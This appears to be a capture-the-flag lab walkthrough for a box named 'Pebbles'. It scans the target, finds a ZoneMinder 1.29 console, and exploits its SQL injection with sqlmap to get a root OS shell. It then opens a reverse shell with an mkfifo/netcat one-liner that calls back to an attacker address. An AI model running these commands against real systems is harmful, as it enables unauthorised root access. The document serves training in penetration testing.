TL;DR
- Fuzz directory to find application which is vulnerable to #SQLi
- Exploit the vulnerable application using #SQLMap to get shell
Enumeration
Port Scan
Start with a basic TCP scan on the target.
$ nmap $ip --top-port 1000 -T4 -vv
PORT STATE SERVICE REASON21/tcp open ftp syn-ack22/tcp open ssh syn-ack80/tcp open http syn-ack3305/tcp open odette-ftp syn-ack8080/tcp open http-proxy syn-ack
PORT STATE SERVICE VERSION21/tcp open ftp vsftpd 3.0.322/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)| ssh-hostkey:| 2048 aa:cf:5a:93:47:18:0e:7f:3d:6d:a5:af:f8:6a:a5:1e (RSA)| 256 c7:63:6c:8a:b5:a7:6f:05:bf:d0:e3:90:b5:b8:96:58 (ECDSA)|_ 256 93:b2:6a:11:63:86:1b:5e:f5:89:58:52:89:7f:f3:42 (ED25519)80/tcp open http Apache httpd 2.4.18 ((Ubuntu))|_http-server-header: Apache/2.4.18 (Ubuntu)|_http-title: Pebbles3305/tcp open http Apache httpd 2.4.18 ((Ubuntu))|_http-server-header: Apache/2.4.18 (Ubuntu)|_http-title: Apache2 Ubuntu Default Page: It works8080/tcp open http Apache httpd 2.4.18 ((Ubuntu))|_http-favicon: Apache Tomcat| http-open-proxy: Potentially OPEN proxy.|_Methods supported:CONNECTION|_http-server-header: Apache/2.4.18 (Ubuntu)|_http-title: TomcatService Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernelDirectory Fuzzing
Since, we have a web service running at port 80. We will use gobuster for directory discovery.
$ gobuster dir -u http://$ip/ -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt -t 50| tee gobuster.txt
images (Status: 301) [Size: 317] [--> http://192.168.245.52/images/]css (Status: 301) [Size: 314] [--> http://192.168.245.52/css/]javascript (Status: 301) [Size: 321] [--> http://192.168.245.52/javascript/]zm (Status: 301) [Size: 313] [--> http://192.168.245.52/zm/]After visiting /zm directory, we find that ZoneMinder console is running on the server. And its version is 1.29.0.
Seachsploit
Quick search using searchsploit will give us following result:
$ searchsploit zoneminder 1.29-------------------------------------------------------------------------------------------------------------------------------------- --------------------------------- Exploit Title | Path-------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------Zoneminder 1.29/1.30 - Cross-Site Scripting / SQL Injection / Session Fixation / Cross-Site Request Forgery | php/webapps/41239.txt-------------------------------------------------------------------------------------------------------------------------------------- ---------------------------------Shellcodes: No ResultsExploit DB | Zoneminder 1.29/1.30 - XSS / SQLi / CSRF
Exploitation
SQLmap
Run SQLmap with following Command:
sqlmap http://$ip/zm/index.php --data="view=request&request=log&task=query&limit=100&minTime=5" --os-shellAfter some time we will get the shell.
[10:26:06] [INFO] calling Linux OS shell. To quit type 'x' or 'q' and press ENTERos-shell> whoami[10:26:24] [INFO] retrieved:rootcommand standard output: 'root'os-shell>os-shell> which nc[10:28:15] [INFO] retrieved: /bin/nccommand standard output: '/bin/ncGetting a Reverse Shell
Since the target machine has nc installed. We will be using it to get a reverse shell connection. Start a netcat listener on your machine and run the following command.
# change the ip and port accordinglyos-shell> rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.49.79 3305 >/tmp/fYou will now receive a reverse shell connection in your nc session. Upgrade the shell to interactive to make it more stable.
$ nc -nvlp 3305listening on [any] 3305 ...connect to [192.168.49.79] from (UNKNOWN) [192.168.79.52] 45580/bin/sh: 0: can't access tty; job control turned off# whoamiRoot# which python3/usr/bin/python3# python3 -c 'import pty;pty.spawn("/bin/bash")'root@pebbles:/var/lib/mysql# cdcdroot@pebbles:~# lslsproof.txtroot@pebbles:~# cat proof.txtcat proof.txt<Flag_Redacted>root@pebbles:~#Since, you get the shell as root user there is no need for privilege escalation.